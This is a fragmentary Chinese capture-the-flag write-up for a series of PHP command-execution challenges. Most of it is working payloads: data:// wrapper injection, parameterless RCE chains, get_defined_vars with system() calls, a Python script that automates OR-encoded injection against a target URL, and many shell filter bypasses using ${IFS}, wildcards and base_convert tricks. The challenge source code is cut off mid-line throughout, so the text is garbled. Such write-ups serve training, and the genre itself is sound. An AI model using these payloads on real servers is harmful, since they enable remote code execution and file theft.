该题自动为我们增加了后缀php，但依旧可以data协议

data://text/plain, 这样就相当于执行了php语句，因为前面的php语句已经闭合了，所以后面的.php会被当成html页面直接显示在页面上，起不到什么作用

直接payload：

?c=data://text/plain,

web40

 |\/|\?|\\\\/i", $c)){        eval($c);    }        }else{    highlight_file(__FILE__);}

该题把中文字符都过滤了，我们只能用英文字符，参考大佬的wp，这里要用无参数的rce

先简单学习一下，参考：PHP Parametric Function RCE · sky's blog

无参数读取文件

1. localeconv()：返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)2. pos()：返回数组中当前元素的值3. scandir()：获取目录下的文件4. array_reverse()：将数组逆序排列5. next()：函数将内部指针指向下一元素，并输出6. show_source()函数对文件进行语法高亮显示，是highlight_file()别名。7. print_r(scandir(‘.’)); 查看当前目录下的所有文件名8. current() 函数返回数组中的当前元素（单元）,默认取第一个值，pos是current的别名

1. print_r() 函数用于打印变量，以更容易理解的形式展示2. get_defined_vars() 函数返回由所有已定义变量所组成的数组。

这里的localeconv函数返回的数组的第一个“点号”，在linux中代表当前目录，因此我们可以用参数调用到点号，进而查看当前目录的文件

print_r(localeconv());

 如下图第一个元素为点号

 利用上述结论可以构造如下payload：

print_r(scandir(pos(localeconv())));   //查看点号（也就是当前目录下的文件）

 如上图看到有flag.php文件，处于倒数第二个位置

在补充如下知识点

array_reverse() 函数以相反的元素顺序返回数组next() 函数将内部指针指向数组中的下一个元素，并输出。highlight_file() 函数对文件进行 PHP 语法高亮显示。语法通过使用 html 标签进行高亮。同时整个文件也会显示出来//构造如下payload：highlight_file(next(array_reverse((scandir(pos(localeconv()))))));//上述先用第一个函数将数组元素顺序颠倒，随后用next函数，将指针指向flag的位置，最终用高亮显示，将了flag文件回显或者#pos()与current()作用相同 readfile()与作用相同highlight_file()?c=readfile(next(array_reverse(scandir(current(localeconv())))));#show_source()与作用相同highlight_file()?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

还有第二个方法：详情可看上文中链接文章

首先get_defined_vars()函数可以回显全局变量，我们配合利用var_dump返回全局变量数组内容

如上图我们可以利用get传参，写入我们的命令，首先要方法取出其中的参数

利用pos返回当前元素的值

在通过end函数使指针指向数组中的最后一个单元，并返回该单元的值，在此之前先通过get传入一个参数数据

 再用end函数

接着在sky写入读取flag的命令

最终payload为：

?c=eval(end(current(get_defined_vars())));&sky=system('cat flag.php');

web41

这次过滤所有字母和数字以及一堆符号 但是留下了一个或运算符 |

参考大佬的wp这题需要用脚本，利用或运算符进行绕过

这里可以尝试从ascii为0-255的字符中，找到或运算能得到我们可用的字符的字符。

# 生成可用字符的集合# rce_or.php=32&ord($c)<=126) {$contents=$contents.$c." ".$a." ".$b."\n";}}}}fwrite($myfile,$contents);fclose($myfile);

# 用法python exp.py # -*- coding: utf-8 -*-import requestsimport urllibfrom sys import *import osos.system("php rce_or.php")  #没有将php写入环境变量需手动运行if(len(argv)!=2):   print("="*50)   print('USER：Python exp.py ')   print("eg：  python exp.py Http://ctf.show/")   print("="*50)   exit(0)url=argv[1]def action(arg):   s1=""   s2=""   for i in arg:       f=open("rce_or.txt","r")       while True:           t=f.readline()           if t=="":               break           if t[0]==i:               #print(i)               s1+=t[2:5]               s2+=t[6:9]               break       f.close()   output="(\""+s1+"\"|\""+s2+"\")"   return(output)   while True:   param=action(input("\n[+] your function：") )+action(input("[+] your command："))   data={       'c':urllib.parse.unquote(param)       }   r=requests.post(url,data=data)   print("\n[*] result:\n"+r.text)

web42

/dev/null 2>&1");}else{    highlight_file(__FILE__);} 

这里先了解一下代码中的>/dev/null 2>&1

>/dev/null 2>&1的意思是 将参数返回的结果重定向到黑洞文件

/dev/null文件可以被看作是一个“黑洞”文件。它等价于一个只写的的文件。所有写入它的内容都会永远丢失(因为不可读)。

/dev/null 2>&1主要意思是不进行回显，让命令回显，我们进行命令分隔
输出黑洞

1：> 代表重定向到哪里，例如：echo “123” > /home/123.txt2：/dev/null 代表空设备文件3：2> 表示stderr标准错误4：& 表示等同于的意思，2>&1，表示2的输出重定向等同于15：1 表示stdout标准输出，系统默认值是1，所以">/dev/null"等同于 “1>/dev/null”因此，>/dev/null 2>&1 也可以写成“1> /dev/null 2> &1”

payload:

?c=tac flag.php;ls;前面的被执行了返回结果，后面的执行了被放入/dev/null中

web43

/dev/null 2>&1");    }}else{    highlight_file(__FILE__);}

这里过滤了cat与分号,构造如下payload

c=nl flag.php||c=tac flag.php||

web44

/dev/null 2>&1");    }}else{    highlight_file(__FILE__);} 

这里又过滤了flag,我们可以使用通配符绕过或者拼接字符串的方式,payload如下

?c=tac fl''ag.php||?c=tac fl*.php||

web45

/dev/null 2>&1");    }}else{    highlight_file(__FILE__);} 

这里又过滤了空格,构造如下payload

?c=tac${IFS}fl*||也可以用%09或者<绕过    //%09是Tab的url编码

web46

/dev/null 2>&1");    }}else{    highlight_file(__FILE__);} 

这里又过滤了数字,通配符以及$,payload如下

使用?绕过对*的过滤

"?"和"*"的区别：

?只能通配某个字符，如flag.php -> fla?.php fl??.ph?

*可以通配整个字符串，如flag.php -> f*

?c=nl%09fl?g.php||     //这里%09还能用是因为,传入时会进行url解码,将其解析为Tab键?c=tac%09fla?.php||?c=nl

/dev/null 2>&1");    }}else{    highlight_file(__FILE__);} 

?c=nl%09fl?g.php||

/dev/null 2>&1");    }}else{    highlight_file(__FILE__);}

?c=nl%09fl?g.php||

/dev/null 2>&1");    }}else{    highlight_file(__FILE__);}

c=tac%09fla?.php||c=nl

/dev/null 2>&1");    }}else{    highlight_file(__FILE__);} 

payload:tac<>fl''ag.php||

/dev/null 2>&1");    }}else{    highlight_file(__FILE__);}

?c=ca\t<>fl''ag.php||?c=nl

|\/dev/null 2>&1");    }}else{    highlight_file(__FILE__);} 

?c=nl${IFS}/fl''ag||//但这里注意flag在根目录下,并不在flag.php

|\".$d;    }else{        echo 'no';    }}else{    highlight_file(__FILE__);}

?c=nl${IFS}/fl''ag||

|\

?c=uniq${IFS}f???????

 #可以使用mv将flag.php文件移动到其他文件 然后访问文件拿到flag ?c=mv${IFS}fla?.php${IFS}a.txt # 使用执行文件目录+?来绕过被过滤的命令 ?c=/bin/?at${IFS}f???????

|\

bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等这里我们可以利用 base64 中的64 进行通配符匹配 即 /bin/base64 flag.php

?c=/???/????64%20????.???  # /bin/base64 flag.php

主要放置一些应用软件工具的必备执行档例如c++、g++、gcc、chdrv、diff、dig、du、eject、elm、free、gnome*、zip、htpasswd、kfm、ktop、last、less、locale、m4、make、man、mcopy、ncftp、newaliases、nslookup passwd、quota、smb*、wget等。我们可以利用/usr/bin下的bzip2 意思就是说我们先将flag.php文件进行压缩，然后再将其下载

|\

            
        文件名：    
    

?c=.%20/???/????????[@-[]

|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){        system("cat ".$c.".php");    }}else{    highlight_file(__FILE__);} 

双小括号 (( )) 是 Bash Shell 中专门用来进行整数运算的命令，它的效率很高，写法灵活，是企业运维中常用的运算命令。    通俗地讲，就是将数学运算表达式放在((和))之间。    表达式可以只有一个，也可以有多个，多个表达式之间以逗号,分隔。对于多个表达式的情况，以最后一个表达式的值作为整个 (( ))命令的执行结果。    可以使用$获取 (( )) 命令的结果，这和使用$获得变量值是类似的。    可以在 (( )) 前面加上$符号获取 (( )) 命令的执行结果，也即获取整个表达式的值。以 c=$((a+b)) 为例，即将 a+b 这个表达式的运算结果赋值给变量 c。    注意，类似 c=((a+b)) 这样的写法是错误的，不加$就不能取得表达式的结果。

$(())是0$((~$(())))是-1$(($((~$(())))$((~$(())))))是-2这里要构造36,也就是要先构造出-37 然后取反-37是37个$((~$(())))相加最终payload?c=$((~$(($((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))))))

file_get_contents()highlight_file()show_source()fgets()file()readfile()

#payload1c=highlight_file("flag.php");#payload2c=show_source('flag.php');#payload3c=$a=fopen("flag.php","r");while($b=fgets($a)){echo $b;}c=show_source(next(array_reverse(scandir(current(localeconv())))));c=echo file_get_contents('flag.php');c=print_r(file('flag.php'));

这些还可以用highlight_file()show_source()fgets()file()

可以用web58的payload//在源代码c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgets($a);echo $line;}c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}c=$a=fopen("flag.php","r");while (!feof($a)) {$line =fgetcsv($a);print_r($line);}c=$a=fopen("flag.php","r");echo fread($a,"1000");c=$a=fopen("flag.php","r");echo fpassthru($a);

c=show_source("flag.php");//奇淫巧技0.0#通过复制，重命名读取php文件内容  c=copy("flag.php","flag.txt");         c=rename("flag.php","flag.txt");#访问flag.txt //之前payload还能用,自己试试c=show_source(next(array_reverse(scandir(current(localeconv())))));c=show_source('flag.php');c=highlight_file('flag.php');

c=show_source(next(array_reverse(scandir(current(localeconv())))));c=show_source('flag.php');c=highlight_file('flag.php');

var_dump() 函数用于输出变量的相关信息。get_defined_vars() 函数返回由所有已定义变量所组成的数组。

c=include('flag.php');var_dump(get_defined_vars());c=show_source(next(array_reverse(scandir(current(localeconv())))));c=highlight_file('flag.php');c=show_source('flag.php');

c=print_r(scandir("/")); #查看根目录文件 print_r被过滤可以换var_dump# 注意根目录是flag.txtc=highlight_file("/flag.txt");

c=include('/flag.txt');

# 多种遍历数组姿势# 1c=$a=scandir("/");foreach($a as $value){echo $value."---";}# 2 glob() 函数返回匹配指定模式的文件名或目录。返回的是数组c=$a=glob("error_reporting(0);//听说你很喜欢数学，不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){    show_source(__FILE__);}else{    //例子 c=20-1    $content = $_GET['c'];    if (strlen($content) >= 80) {        die("太长了不会算");    }    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];    foreach ($blacklist as $blackitem) {        if (preg_match('/' . $blackitem . '/m', $content)) {            die("请不要输入奇奇怪怪的字符");        }    }    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);      foreach ($used_funcs[0] as $func) {        if (!in_array($func, $whitelist)) {            die("请不要输入奇奇怪怪的函数");        }    }    //帮你算出答案    eval('echo '.$content.';');} 

echo base_convert('system',36,10);//得到1751504350，从36进制转换到10进制，36进制包含10个数字和26个字母echo base_convert('getallheaders',30,10);//得到8768397090111664438，这里不使用36进制是因为精度会丢失，尝试到30的时候成功

?c=$pi=base_convert,$pi(1751504350,10,36)($pi(8768397090111664438,10,30)(){1})